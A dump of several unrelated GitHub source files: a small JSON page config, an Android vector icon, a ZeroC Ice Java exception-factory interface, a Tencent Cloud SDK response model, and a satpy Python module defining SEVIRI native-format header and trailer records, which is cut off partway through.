"pile_set_name": "Github"
} |
{
"navigationBarTitleText": "打电话"
}
| {
"pile_set_name": "Github"
} |
<vector xmlns:android="http://schemas.android.com/apk/res/android"
android:width="24dp"
android:height="24dp"
android:viewportWidth="24.0"
android:viewportHeight="24.0">
<path
android:fillColor="#FF000000"
android:pathData="M11.99,2C6.47,2 2,6.48 2,12s4.47,10 9.99,10C17.52,22 22,17.52 22,12S17.52,2 11.99,2zM12,20c-4.42,0 -8,-3.58 -8,-8s3.58,-8 8,-8 8,3.58 8,8 -3.58,8 -8,8zM15.5,11c0.83,0 1.5,-0.67 1.5,-1.5S16.33,8 15.5,8 14,8.67 14,9.5s0.67,1.5 1.5,1.5zM8.5,11c0.83,0 1.5,-0.67 1.5,-1.5S9.33,8 8.5,8 7,8.67 7,9.5 7.67,11 8.5,11zM12,14c-2.33,0 -4.31,1.46 -5.11,3.5h10.22c-0.8,-2.04 -2.78,-3.5 -5.11,-3.5z"/>
</vector>
| {
"pile_set_name": "Github"
} |
//
// Copyright (c) ZeroC, Inc. All rights reserved.
//
package Ice;
/**
* Instantiates user exceptions.
*
* @see InputStream#throwException
**/
public interface UserExceptionFactory
{
/**
* Instantiate a user exception with the given Slice type ID (such as <code>::Module::MyException</code>)
* and throw it. If the implementation does not throw an exception, the Ice run time will fall back
* to using its default behavior for instantiating the user exception.
*
* @param typeId The Slice type ID of the user exception to be created.
* @throws UserException A user exception instance corresponding to the type ID.
**/
void createAndThrow(String typeId)
throws UserException;
}
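// Illustrative sketch (not part of the Ice distribution): a factory that
// instantiates one known user exception and otherwise simply returns, letting
// the Ice run time fall back to its default behavior. The exception class
// name here is hypothetical.
//
// class MyExceptionFactory implements Ice.UserExceptionFactory
// {
//     public void createAndThrow(String typeId)
//         throws Ice.UserException
//     {
//         if (typeId.equals("::Module::MyException"))
//         {
//             throw new Module.MyException();
//         }
//         // Not throwing here triggers the default instantiation behavior.
//     }
// }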
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.tencentcloudapi.mps.v20190612.models;
import com.tencentcloudapi.common.AbstractModel;
import com.google.gson.annotations.SerializedName;
import com.google.gson.annotations.Expose;
import java.util.HashMap;
public class DescribeSampleSnapshotTemplatesResponse extends AbstractModel{
/**
* Total number of records that match the filter conditions.
*/
@SerializedName("TotalCount")
@Expose
private Long TotalCount;
/**
* List of sampled screenshot template details.
*/
@SerializedName("SampleSnapshotTemplateSet")
@Expose
private SampleSnapshotTemplate [] SampleSnapshotTemplateSet;
/**
* Unique request ID, returned with every request. The RequestId of a request is needed when troubleshooting it.
*/
@SerializedName("RequestId")
@Expose
private String RequestId;
/**
* Get the total number of records that match the filter conditions.
* @return TotalCount Total number of records that match the filter conditions.
*/
public Long getTotalCount() {
return this.TotalCount;
}
/**
* Set the total number of records that match the filter conditions.
* @param TotalCount Total number of records that match the filter conditions.
*/
public void setTotalCount(Long TotalCount) {
this.TotalCount = TotalCount;
}
/**
* Get the list of sampled screenshot template details.
* @return SampleSnapshotTemplateSet List of sampled screenshot template details.
*/
public SampleSnapshotTemplate [] getSampleSnapshotTemplateSet() {
return this.SampleSnapshotTemplateSet;
}
/**
* Set the list of sampled screenshot template details.
* @param SampleSnapshotTemplateSet List of sampled screenshot template details.
*/
public void setSampleSnapshotTemplateSet(SampleSnapshotTemplate [] SampleSnapshotTemplateSet) {
this.SampleSnapshotTemplateSet = SampleSnapshotTemplateSet;
}
/**
* Get the unique request ID, which is returned with every request. The RequestId of a request is needed when troubleshooting it.
* @return RequestId Unique request ID, returned with every request. The RequestId of a request is needed when troubleshooting it.
*/
public String getRequestId() {
return this.RequestId;
}
/**
* Set the unique request ID, which is returned with every request. The RequestId of a request is needed when troubleshooting it.
* @param RequestId Unique request ID, returned with every request. The RequestId of a request is needed when troubleshooting it.
*/
public void setRequestId(String RequestId) {
this.RequestId = RequestId;
}
/**
* Internal implementation, normal users should not use it.
*/
public void toMap(HashMap<String, String> map, String prefix) {
this.setParamSimple(map, prefix + "TotalCount", this.TotalCount);
this.setParamArrayObj(map, prefix + "SampleSnapshotTemplateSet.", this.SampleSnapshotTemplateSet);
this.setParamSimple(map, prefix + "RequestId", this.RequestId);
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2019 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Header and trailer records of SEVIRI native format.
"""
import numpy as np
from satpy.readers.eum_base import (time_cds_short, time_cds,
time_cds_expanded)
class GSDTRecords(object):
"""MSG Ground Segment Data Type records.
Reference Document (EUM/MSG/SPE/055):
MSG Ground Segment Design Specification (GSDS)
"""
gp_fac_env = np.uint8
gp_fac_id = np.uint8
gp_sc_id = np.uint16
gp_su_id = np.uint32
gp_svce_type = np.uint8
# 4 bytes
gp_cpu_address = [
('Qualifier_1', np.uint8),
('Qualifier_2', np.uint8),
('Qualifier_3', np.uint8),
('Qualifier_4', np.uint8)
]
# 22 bytes
gp_pk_header = [
('HeaderVersionNo', np.uint8),
('PacketType', np.uint8),
('SubHeaderType', np.uint8),
('SourceFacilityId', gp_fac_id),
('SourceEnvId', gp_fac_env),
('SourceInstanceId', np.uint8),
('SourceSUId', gp_su_id),
('SourceCPUId', gp_cpu_address),
('DestFacilityId', gp_fac_id),
('DestEnvId', gp_fac_env),
('SequenceCount', np.uint16),
('PacketLength', np.int32)
]
# 16 bytes
gp_pk_sh1 = [
('SubHeaderVersionNo', np.uint8),
('ChecksumFlag', np.bool),
('Acknowledgement', (np.uint8, 4)),
('ServiceType', gp_svce_type),
('ServiceSubtype', np.uint8),
('PacketTime', time_cds_short),
('SpacecraftId', gp_sc_id)
]
class Msg15NativeHeaderRecord(object):
"""
SEVIRI Level 1.5 header for native-format
"""
def get(self):
# 450400 bytes
record = [
('15_MAIN_PRODUCT_HEADER', L15MainProductHeaderRecord().get()),
('15_SECONDARY_PRODUCT_HEADER',
L15SecondaryProductHeaderRecord().get()),
('GP_PK_HEADER', GSDTRecords.gp_pk_header),
('GP_PK_SH1', GSDTRecords.gp_pk_sh1),
('15_DATA_HEADER', L15DataHeaderRecord().get())
]
return np.dtype(record).newbyteorder('>')
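# The big-endian structured dtype built above can be mapped directly onto the
# start of a native file, e.g. (sketch; `fname` is a placeholder):
#   header = np.fromfile(fname, dtype=Msg15NativeHeaderRecord().get(), count=1)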
class L15PhData(object):
# 80 bytes
l15_ph_data = [
('Name', 'S30'),
('Value', 'S50')
]
class L15MainProductHeaderRecord(object):
"""
Reference Document:
MSG Level 1.5 Native Format File Definition
"""
def get(self):
l15_ph_data = L15PhData.l15_ph_data
l15_ph_data_identification = [
('Name', 'S30'),
('Size', 'S16'),
('Address', 'S16')
]
# 3674 bytes
record = [
('FormatName', l15_ph_data),
('FormatDocumentName', l15_ph_data),
('FormatDocumentMajorVersion', l15_ph_data),
('FormatDocumentMinorVersion', l15_ph_data),
('CreationDateTime', l15_ph_data),
('CreatingCentre', l15_ph_data),
('DataSetIdentification', (l15_ph_data_identification, 27)),
('TotalFileSize', l15_ph_data),
('GORT', l15_ph_data),
('ASTI', l15_ph_data),
('LLOS', l15_ph_data),
('SNIT', l15_ph_data),
('AIID', l15_ph_data),
('SSBT', l15_ph_data),
('SSST', l15_ph_data),
('RRCC', l15_ph_data),
('RRBT', l15_ph_data),
('RRST', l15_ph_data),
('PPRC', l15_ph_data),
('PPDT', l15_ph_data),
('GPLV', l15_ph_data),
('APNM', l15_ph_data),
('AARF', l15_ph_data),
('UUDT', l15_ph_data),
('QQOV', l15_ph_data),
('UDSP', l15_ph_data)
]
return record
class L15SecondaryProductHeaderRecord(object):
"""
Reference Document:
MSG Level 1.5 Native Format File Definition
"""
def get(self):
l15_ph_data = L15PhData.l15_ph_data
# 1440 bytes
record = [
('ABID', l15_ph_data),
('SMOD', l15_ph_data),
('APXS', l15_ph_data),
('AVPA', l15_ph_data),
('LSCD', l15_ph_data),
('LMAP', l15_ph_data),
('QDLC', l15_ph_data),
('QDLP', l15_ph_data),
('QQAI', l15_ph_data),
('SelectedBandIDs', l15_ph_data),
('SouthLineSelectedRectangle', l15_ph_data),
('NorthLineSelectedRectangle', l15_ph_data),
('EastColumnSelectedRectangle', l15_ph_data),
('WestColumnSelectedRectangle', l15_ph_data),
('NumberLinesVISIR', l15_ph_data),
('NumberColumnsVISIR', l15_ph_data),
('NumberLinesHRV', l15_ph_data),
('NumberColumnsHRV', l15_ph_data)
]
return record
class L15DataHeaderRecord(object):
"""
Reference Document (EUM/MSG/ICD/105):
MSG Level 1.5 Image Data Format Description
"""
def get(self):
# 445248 bytes
record = [
('15HeaderVersion', np.uint8),
('SatelliteStatus', self.satellite_status),
('ImageAcquisition', self.image_acquisition),
('CelestialEvents', self.celestial_events),
('ImageDescription', self.image_description),
('RadiometricProcessing', self.radiometric_processing),
('GeometricProcessing', self.geometric_processing),
('IMPFConfiguration', self.impf_configuration)]
return record
@property
def satellite_status(self):
# 7 bytes
satellite_definition = [
('SatelliteId', np.uint16),
('NominalLongitude', np.float32),
('SatelliteStatus', np.uint8)]
# 28 bytes
satellite_operations = [
('LastManoeuvreFlag', np.bool),
('LastManoeuvreStartTime', time_cds_short),
('LastManoeuvreEndTime', time_cds_short),
('LastManoeuvreType', np.uint8),
('NextManoeuvreFlag', np.bool),
('NextManoeuvreStartTime', time_cds_short),
('NextManoeuvreEndTime', time_cds_short),
('NextManoeuvreType', np.uint8)]
# 396 bytes
orbit_coeff = [
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('X', (np.float64, 8)),
('Y', (np.float64, 8)),
('Z', (np.float64, 8)),
('VX', (np.float64, 8)),
('VY', (np.float64, 8)),
('VZ', (np.float64, 8))]
# 39612 bytes
orbit = [
('PeriodStartTime', time_cds_short),
('PeriodEndTime', time_cds_short),
('OrbitPolynomial', (orbit_coeff, 100))]
# 204 bytes
attitude_coeff = [
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('XofSpinAxis', (np.float64, 8)),
('YofSpinAxis', (np.float64, 8)),
('ZofSpinAxis', (np.float64, 8))]
# 20420 bytes
attitude = [
('PeriodStartTime', time_cds_short),
('PeriodEndTime', time_cds_short),
('PrincipleAxisOffsetAngle', np.float64),
('AttitudePolynomial', (attitude_coeff, 100))]
# 59 bytes
utc_correlation = [
('PeriodStartTime', time_cds_short),
('PeriodEndTime', time_cds_short),
('OnBoardTimeStart', (np.uint8, 7)),
('VarOnBoardTimeStart', np.float64),
('A1', np.float64),
('VarA1', np.float64),
('A2', np.float64),
('VarA2', np.float64)]
# 60134 bytes
record = [
('SatelliteDefinition', satellite_definition),
('SatelliteOperations', satellite_operations),
('Orbit', orbit),
('Attitude', attitude),
('SpinRetreatRCStart', np.float64),
('UTCCorrelation', utc_correlation)]
return record
@property
def image_acquisition(self):
planned_acquisition_time = [
('TrueRepeatCycleStart', time_cds_expanded),
('PlanForwardScanEnd', time_cds_expanded),
('PlannedRepeatCycleEnd', time_cds_expanded)]
radiometer_status = [
('ChannelStatus', (np.uint8, 12)),
('DetectorStatus', (np.uint8, 42))]
hrv_frame_offsets = [
('MDUNomHRVDelay1', np.uint16),
('MDUNomHRVDelay2', np.uint16),
('Spare', np.uint16),
('MDUNomHRVBreakLine', np.uint16)]
operation_parameters = [
('L0_LineCounter', np.uint16),
('K1_RetraceLines', np.uint16),
('K2_PauseDeciseconds', np.uint16),
('K3_RetraceLines', np.uint16),
('K4_PauseDeciseconds', np.uint16),
('K5_RetraceLines', np.uint16),
('XDeepSpaceWindowPosition', np.uint8)]
radiometer_settings = [
('MDUSamplingDelays', (np.uint16, 42)),
('HRVFrameOffsets', hrv_frame_offsets),
('DHSSSynchSelection', np.uint8),
('MDUOutGain', (np.uint16, 42)),
('MDUCoarseGain', (np.uint8, 42)),
('MDUFineGain', (np.uint16, 42)),
('MDUNumericalOffset', (np.uint16, 42)),
('PUGain', (np.uint16, 42)),
('PUOffset', (np.uint16, 27)),
('PUBias', (np.uint16, 15)),
('OperationParameters', operation_parameters),
('RefocusingLines', np.uint16),
('RefocusingDirection', np.uint8),
('RefocusingPosition', np.uint16),
('ScanRefPosFlag', np.bool),
('ScanRefPosNumber', np.uint16),
('ScanRefPosVal', np.float32),
('ScanFirstLine', np.uint16),
('ScanLastLine', np.uint16),
('RetraceStartLine', np.uint16)]
decontamination = [
('DecontaminationNow', np.bool),
('DecontaminationStart', time_cds_short),
('DecontaminationEnd', time_cds_short)]
radiometer_operations = [
('LastGainChangeFlag', np.bool),
('LastGainChangeTime', time_cds_short),
('Decontamination', decontamination),
('BBCalScheduled', np.bool),
('BBCalibrationType', np.uint8),
('BBFirstLine', np.uint16),
('BBLastLine', np.uint16),
('ColdFocalPlaneOpTemp', np.uint16),
('WarmFocalPlaneOpTemp', np.uint16)]
record = [
('PlannedAcquisitionTime', planned_acquisition_time),
('RadiometerStatus', radiometer_status),
('RadiometerSettings', radiometer_settings),
('RadiometerOperations', radiometer_operations)]
return record
@property
def celestial_events(self):
earth_moon_sun_coeff = [
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('AlphaCoef', (np.float64, 8)),
('BetaCoef', (np.float64, 8))]
star_coeff = [
('StarId', np.uint16),
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('AlphaCoef', (np.float64, 8)),
('BetaCoef', (np.float64, 8))]
ephemeris = [
('PeriodTimeStart', time_cds_short),
('PeriodTimeEnd', time_cds_short),
('RelatedOrbitFileTime', 'S15'),
('RelatedAttitudeFileTime', 'S15'),
('EarthEphemeris', (earth_moon_sun_coeff, 100)),
('MoonEphemeris', (earth_moon_sun_coeff, 100)),
('SunEphemeris', (earth_moon_sun_coeff, 100)),
('StarEphemeris', (star_coeff, (20, 100)))]
relation_to_image = [
('TypeOfEclipse', np.uint8),
('EclipseStartTime', time_cds_short),
('EclipseEndTime', time_cds_short),
('VisibleBodiesInImage', np.uint8),
('BodiesCloseToFOV', np.uint8),
('ImpactOnImageQuality', np.uint8)]
record = [
('CelestialBodiesPosition', ephemeris),
('RelationToImage', relation_to_image)]
return record
@property
def image_description(self):
projection_description = [
('TypeOfProjection', np.uint8),
('LongitudeOfSSP', np.float32)]
reference_grid = [
('NumberOfLines', np.int32),
('NumberOfColumns', np.int32),
('LineDirGridStep', np.float32),
('ColumnDirGridStep', np.float32),
('GridOrigin', np.uint8)]
planned_coverage_vis_ir = [
('SouthernLinePlanned', np.int32),
('NorthernLinePlanned', np.int32),
('EasternColumnPlanned', np.int32),
('WesternColumnPlanned', np.int32)]
planned_coverage_hrv = [
('LowerSouthLinePlanned', np.int32),
('LowerNorthLinePlanned', np.int32),
('LowerEastColumnPlanned', np.int32),
('LowerWestColumnPlanned', np.int32),
('UpperSouthLinePlanned', np.int32),
('UpperNorthLinePlanned', np.int32),
('UpperEastColumnPlanned', np.int32),
('UpperWestColumnPlanned', np.int32)]
level_15_image_production = [
('ImageProcDirection', np.uint8),
('PixelGenDirection', np.uint8),
('PlannedChanProcessing', (np.uint8, 12))]
record = [
('ProjectionDescription', projection_description),
('ReferenceGridVIS_IR', reference_grid),
('ReferenceGridHRV', reference_grid),
('PlannedCoverageVIS_IR', planned_coverage_vis_ir),
('PlannedCoverageHRV', planned_coverage_hrv),
('Level15ImageProduction', level_15_image_production)]
return record
@property
def radiometric_processing(self):
rp_summary = [
('RadianceLinearization', (np.bool, 12)),
('DetectorEqualization', (np.bool, 12)),
('OnboardCalibrationResult', (np.bool, 12)),
('MPEFCalFeedback', (np.bool, 12)),
('MTFAdaptation', (np.bool, 12)),
('StrayLightCorrection', (np.bool, 12))]
level_15_image_calibration = [
('CalSlope', np.float64),
('CalOffset', np.float64)]
time_cuc_size = [
('CT1', np.uint8),
('CT2', np.uint8),
('CT3', np.uint8),
('CT4', np.uint8),
('FT1', np.uint8),
('FT2', np.uint8),
('FT3', np.uint8)]
cold_fp_temperature = [
('FCUNominalColdFocalPlaneTemp', np.uint16),
('FCURedundantColdFocalPlaneTemp', np.uint16)]
warm_fp_temperature = [
('FCUNominalWarmFocalPlaneVHROTemp', np.uint16),
('FCURedundantWarmFocalPlaneVHROTemp', np.uint16)]
scan_mirror_temperature = [
('FCUNominalScanMirrorSensor1Temp', np.uint16),
('FCURedundantScanMirrorSensor1Temp', np.uint16),
('FCUNominalScanMirrorSensor2Temp', np.uint16),
('FCURedundantScanMirrorSensor2Temp', np.uint16)]
m1m2m3_temperature = [
('FCUNominalM1MirrorSensor1Temp', np.uint16),
('FCURedundantM1MirrorSensor1Temp', np.uint16),
('FCUNominalM1MirrorSensor2Temp', np.uint16),
('FCURedundantM1MirrorSensor2Temp', np.uint16),
('FCUNominalM23AssemblySensor1Temp', np.uint8),
('FCURedundantM23AssemblySensor1Temp', np.uint8),
('FCUNominalM23AssemblySensor2Temp', np.uint8),
('FCURedundantM23AssemblySensor2Temp', np.uint8)]
baffle_temperature = [
('FCUNominalM1BaffleTemp', np.uint16),
('FCURedundantM1BaffleTemp', np.uint16)]
blackbody_temperature = [
('FCUNominalBlackBodySensorTemp', np.uint16),
('FCURedundantBlackBodySensorTemp', np.uint16)]
fcu_mode = [
('FCUNominalSMMStatus', 'S2'),
('FCURedundantSMMStatus', 'S2')]
extracted_bb_data = [
('NumberOfPixelsUsed', np.uint32),
('MeanCount', np.float32),
('RMS', np.float32),
('MaxCount', np.uint16),
('MinCount', np.uint16),
('BB_Processing_Slope', np.float64),
('BB_Processing_Offset', np.float64)]
bb_related_data = [
('OnBoardBBTime', time_cuc_size),
('MDUOutGain', (np.uint16, 42)),
('MDUCoarseGain', (np.uint8, 42)),
('MDUFineGain', (np.uint16, 42)),
('MDUNumericalOffset', (np.uint16, 42)),
('PUGain', (np.uint16, 42)),
('PUOffset', (np.uint16, 27)),
('PUBias', (np.uint16, 15)),
('DCRValues', (np.uint8, 63)),
('X_DeepSpaceWindowPosition', np.int8),
('ColdFPTemperature', cold_fp_temperature),
('WarmFPTemperature', warm_fp_temperature),
('ScanMirrorTemperature', scan_mirror_temperature),
('M1M2M3Temperature', m1m2m3_temperature),
('BaffleTemperature', baffle_temperature),
('BlackBodyTemperature', blackbody_temperature),
('FCUMode', fcu_mode),
('ExtractedBBData', (extracted_bb_data, 12))]
black_body_data_used = [
('BBObservationUTC', time_cds_expanded),
('BBRelatedData', bb_related_data)]
impf_cal_data = [
('ImageQualityFlag', np.uint8),
('ReferenceDataFlag', np.uint8),
('AbsCalMethod', np.uint8),
('Pad1', 'S1'),
('AbsCalWeightVic', np.float32),
('AbsCalWeightXsat', np.float32),
('AbsCalCoeff', np.float32),
('AbsCalError', np.float32),
('GSICSCalCoeff', np.float32),
('GSICSCalError', np.float32),
('GSICSOffsetCount', np.float32)]
rad_proc_mtf_adaptation = [
('VIS_IRMTFCorrectionE_W', (np.float32, (33, 16))),
('VIS_IRMTFCorrectionN_S', (np.float32, (33, 16))),
('HRVMTFCorrectionE_W', (np.float32, (9, 16))),
('HRVMTFCorrectionN_S', (np.float32, (9, 16))),
('StraylightCorrection', (np.float32, (12, 8, 8)))]
record = [
('RPSummary', rp_summary),
('Level15ImageCalibration', (level_15_image_calibration, 12)),
('BlackBodyDataUsed', black_body_data_used),
('MPEFCalFeedback', (impf_cal_data, 12)),
('RadTransform', (np.float32, (42, 64))),
('RadProcMTFAdaptation', rad_proc_mtf_adaptation)]
return record
@property
def geometric_processing(self):
opt_axis_distances = [
('E-WFocalPlane', (np.float32, 42)),
('N_SFocalPlane', (np.float32, 42))]
earth_model = [
('TypeOfEarthModel', np.uint8),
('EquatorialRadius', np.float64),
('NorthPolarRadius', np.float64),
('SouthPolarRadius', np.float64)]
record = [
('OptAxisDistances', opt_axis_distances),
('EarthModel', earth_model),
('AtmosphericModel', (np.float32, (12, 360))),
('ResamplingFunctions', (np.uint8, 12))]
return record
@property
def impf_configuration(self):
overall_configuration = [
('Issue', np.uint16),
('Revision', np.uint16)
]
sw_version = overall_configuration
info_base_versions = sw_version
su_configuration = [
('SWVersion', sw_version),
('InfoBaseVersions', (info_base_versions, 10))
]
su_details = [
('SUId', GSDTRecords.gp_su_id),
('SUIdInstance', np.int8),
('SUMode', np.uint8),
('SUState', np.uint8),
('SUConfiguration', su_configuration)
]
equalisation_params = [
('ConstCoeff', np.float32),
('LinearCoeff', np.float32),
('QuadraticCoeff', np.float32)
]
black_body_data_for_warm_start = [
('GTotalForMethod1', (np.float64, 12)),
('GTotalForMethod2', (np.float64, 12)),
('GTotalForMethod3', (np.float64, 12)),
('GBackForMethod1', (np.float64, 12)),
('GBackForMethod2', (np.float64, 12)),
('GBackForMethod3', (np.float64, 12)),
('RatioGTotalToGBack', (np.float64, 12)),
('GainInFrontOpticsCont', (np.float64, 12)),
('CalibrationConstants', (np.float32, 12)),
('maxIncidentRadiance', (np.float64, 12)),
('TimeOfColdObsSeconds', np.float64),
('TimeOfColdObsNanoSecs', np.float64),
('IncidenceRadiance', (np.float64, 12)),
('TempCal', np.float64),
('TempM1', np.float64),
('TempScan', np.float64),
('TempM1Baf', np.float64),
('TempCalSurround', np.float64)
]
mirror_parameters = [
('MaxFeedbackVoltage', np.float64),
('MinFeedbackVoltage', np.float64),
('MirrorSlipEstimate', np.float64)
]
hktm_parameters = [
('TimeS0Packet', time_cds_short),
('TimeS1Packet', time_cds_short),
('TimeS2Packet', time_cds_short),
('TimeS3Packet', time_cds_short),
('TimeS4Packet', time_cds_short),
('TimeS5Packet', time_cds_short),
('TimeS6Packet', time_cds_short),
('TimeS7Packet', time_cds_short),
('TimeS8Packet', time_cds_short),
('TimeS9Packet', time_cds_short),
('TimeSYPacket', time_cds_short),
('TimePSPacket', time_cds_short)
]
warm_start_params = [
('ScanningLaw', (np.float64, 1527)),
('RadFramesAlignment', (np.float64, 3)),
('ScanningLawVariation', (np.float32, 2)),
('EqualisationParams', (equalisation_params, 42)),
('BlackBodyDataForWarmStart', black_body_data_for_warm_start),
('MirrorParameters', mirror_parameters),
('LastSpinPeriod', np.float64),
('HKTMParameters', hktm_parameters),
('WSPReserved', (np.uint8, 3312))
]
record = [
('OverallConfiguration', overall_configuration),
('SUDetails', (su_details, 50)),
('WarmStartParams', warm_start_params)
]
return record
class Msg15NativeTrailerRecord(object):
"""
SEVIRI Level 1.5 trailer for the native format.
Reference Document (EUM/MSG/ICD/105):
MSG Level 1.5 Image Data Format Description
"""
def get(self):
# 380363 bytes
record = [
('GP_PK_HEADER', GSDTRecords.gp_pk_header),
('GP_PK_SH1', GSDTRecords.gp_pk_sh1),
('15TRAILER', self.seviri_l15_trailer)
]
return np.dtype(record).newbyteorder('>')
@property
def seviri_l15_trailer(self):
record = [
('15TrailerVersion', np.uint8),
('ImageProductionStats', self.image_production_stats),
('NavigationExtractionResults', self.navigation_extraction_results),
('RadiometricQuality', self.radiometric_quality),
('GeometricQuality', self.geometric_quality),
('TimelinessAndCompleteness', self.timeliness_and_completeness)
]
return record
@property
def image_production_stats(self):
gp_sc_id = GSDTRecords.gp_sc_id
actual_scanning_summary = [
('NominalImageScanning', np.uint8),
('ReducedScan', np.uint8),
('ForwardScanStart', time_cds_short),
('ForwardScanEnd', time_cds_short)
]
radiometric_behaviour = [
('NominalBehaviour', np.uint8),
('RadScanIrregularity', np.uint8),
('RadStoppage', np.uint8),
('RepeatCycleNotCompleted', np.uint8),
('GainChangeTookPlace', np.uint8),
('DecontaminationTookPlace', np.uint8),
('NoBBCalibrationAchieved', np.uint8),
('IncorrectTemperature', np.uint8),
('InvalidBBData', np.uint8),
('InvalidAuxOrHKTMData', np.uint8),
('RefocusingMechanismActuated', np.uint8),
('MirrorBackToReferencePos', np.uint8)
]
reception_summary_stats = [
('PlannedNumberOfL10Lines', (np.uint32, 12)),
('NumberOfMissingL10Lines', (np.uint32, 12)),
('NumberOfCorruptedL10Lines', (np.uint32, 12)),
('NumberOfReplacedL10Lines', (np.uint32, 12))
]
l15_image_validity = [
('NominalImage', np.uint8),
('NonNominalBecauseIncomplete', np.uint8),
('NonNominalRadiometricQuality', np.uint8),
('NonNominalGeometricQuality', np.uint8),
('NonNominalTimeliness', np.uint8),
('IncompleteL15', np.uint8),
]
actual_l15_coverage_vis_ir = [
('SouthernLineActual', np.int32),
('NorthernLineActual', np.int32),
('EasternColumnActual', np.int32),
('WesternColumnActual', np.int32)
]
actual_l15_coverage_hrv = [
('LowerSouthLineActual', np.int32),
('LowerNorthLineActual', np.int32),
('LowerEastColumnActual', np.int32),
('LowerWestColumnActual', np.int32),
('UpperSouthLineActual', np.int32),
('UpperNorthLineActual', np.int32),
('UpperEastColumnActual', np.int32),
('UpperWestColumnActual', np.int32),
]
record = [
('SatelliteId', gp_sc_id),
('ActualScanningSummary', actual_scanning_summary),
('RadiometricBehaviour', radiometric_behaviour),
('ReceptionSummaryStats', reception_summary_stats),
('L15ImageValidity', (l15_image_validity, 12)),
('ActualL15CoverageVIS_IR', actual_l15_coverage_vis_ir),
('ActualL15CoverageHRV', actual_l15_coverage_hrv)
]
return record
@property
def navigation_extraction_results(self):
horizon_observation = [
('HorizonId', np.uint8),
('Alpha', np.float64),
('AlphaConfidence', np.float64),
('Beta', np.float64),
('BetaConfidence', np.float64),
('ObservationTime', time_cds),
('SpinRate', np.float64),
('AlphaDeviation', np.float64),
('BetaDeviation', np.float64)
]
star_observation = [
('StarId', np.uint16),
('Alpha', np.float64),
('AlphaConfidence', np.float64),
('Beta', np.float64),
('BetaConfidence', np.float64),
('ObservationTime', time_cds),
('SpinRate', np.float64),
('AlphaDeviation', np.float64),
('BetaDeviation', np.float64)
]
landmark_observation = [
('LandmarkId', np.uint16),
('LandmarkLongitude', np.float64),
('LandmarkLatitude', np.float64),
('Alpha', np.float64),
('AlphaConfidence', np.float64),
('Beta', np.float64),
('BetaConfidence', np.float64),
('ObservationTime', time_cds),
('SpinRate', np.float64),
('AlphaDeviation', np.float64),
('BetaDeviation', np.float64)
]
record = [
('ExtractedHorizons', (horizon_observation, 4)),
('ExtractedStars', (star_observation, 20)),
('ExtractedLandmarks', (landmark_observation, 50))
]
return record
@property
def radiometric_quality(self):
l10_rad_quality = [
('FullImageMinimumCount', np.uint16),
('FullImageMaximumCount', np.uint16),
('EarthDiskMinimumCount', np.uint16),
('EarthDiskMaximumCount', np.uint16),
('MoonMinimumCount', np.uint16),
('MoonMaximumCount', np.uint16),
('FullImageMeanCount', np.float32),
('FullImageStandardDeviation', np.float32),
('EarthDiskMeanCount', np.float32),
('EarthDiskStandardDeviation', np.float32),
('MoonMeanCount', np.float32),
('MoonStandardDeviation', np.float32),
('SpaceMeanCount', np.float32),
('SpaceStandardDeviation', np.float32),
('SESpaceCornerMeanCount', np.float32),
('SESpaceCornerStandardDeviation', np.float32),
('SWSpaceCornerMeanCount', np.float32),
('SWSpaceCornerStandardDeviation', np.float32),
('NESpaceCornerMeanCount', np.float32),
('NESpaceCornerStandardDeviation', np.float32),
('NWSpaceCornerMeanCount', np.float32),
('NWSpaceCornerStandardDeviation', np.float32),
('4SpaceCornersMeanCount', np.float32),
('4SpaceCornersStandardDeviation', np.float32),
('FullImageHistogram', (np.uint32, 256)),
('EarthDiskHistogram', (np.uint32, 256)),
('ImageCentreSquareHistogram', (np.uint32, 256)),
('SESpaceCornerHistogram', (np.uint32, 128)),
('SWSpaceCornerHistogram', (np.uint32, 128)),
('NESpaceCornerHistogram', (np.uint32, 128)),
('NWSpaceCornerHistogram', (np.uint32, 128)),
('FullImageEntropy', (np.float32, 3)),
('EarthDiskEntropy', (np.float32, 3)),
('ImageCentreSquareEntropy', (np.float32, 3)),
('SESpaceCornerEntropy', (np.float32, 3)),
('SWSpaceCornerEntropy', (np.float32, 3)),
('NESpaceCornerEntropy', (np.float32, 3)),
('NWSpaceCornerEntropy', (np.float32, 3)),
('4SpaceCornersEntropy', (np.float32, 3)),
('ImageCentreSquarePSD_EW', (np.float32, 128)),
('FullImagePSD_EW', (np.float32, 128)),
('ImageCentreSquarePSD_NS', (np.float32, 128)),
('FullImagePSD_NS', (np.float32, 128))
]
l15_rad_quality = [
('FullImageMinimumCount', np.uint16),
('FullImageMaximumCount', np.uint16),
('EarthDiskMinimumCount', np.uint16),
('EarthDiskMaximumCount', np.uint16),
('FullImageMeanCount', np.float32),
('FullImageStandardDeviation', np.float32),
('EarthDiskMeanCount', np.float32),
('EarthDiskStandardDeviation', np.float32),
('SpaceMeanCount', np.float32),
('SpaceStandardDeviation', np.float32),
('FullImageHistogram', (np.uint32, 256)),
('EarthDiskHistogram', (np.uint32, 256)),
('ImageCentreSquareHistogram', (np.uint32, 256)),
('FullImageEntropy', (np.float32, 3)),
('EarthDiskEntropy', (np.float32, 3)),
('ImageCentreSquareEntropy', (np.float32, 3)),
('ImageCentreSquarePSD_EW', (np.float32, 128)),
('FullImagePSD_EW', (np.float32, 128)),
('ImageCentreSquarePSD_NS', (np.float32, 128)),
('FullImagePSD_NS', (np.float32, 128)),
